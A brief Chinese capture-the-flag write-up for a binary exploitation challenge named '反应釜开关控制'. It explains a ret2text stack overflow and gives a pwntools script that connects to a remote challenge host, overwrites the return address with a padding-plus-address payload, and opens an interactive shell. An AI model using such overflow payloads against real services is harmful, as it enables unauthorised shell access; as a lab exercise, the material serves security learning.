反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote("111.200.241.244",52515) payload=b'a'*512+b'b'*8+p64(0x00004005F6) p.sendline(payload) p.interactive()